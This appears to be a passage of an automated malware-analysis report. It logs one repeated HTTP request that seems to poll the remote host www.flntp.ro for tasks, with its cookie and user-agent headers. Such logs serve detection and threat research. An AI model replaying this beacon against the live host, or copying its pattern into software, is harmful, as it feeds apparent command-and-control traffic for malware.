          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
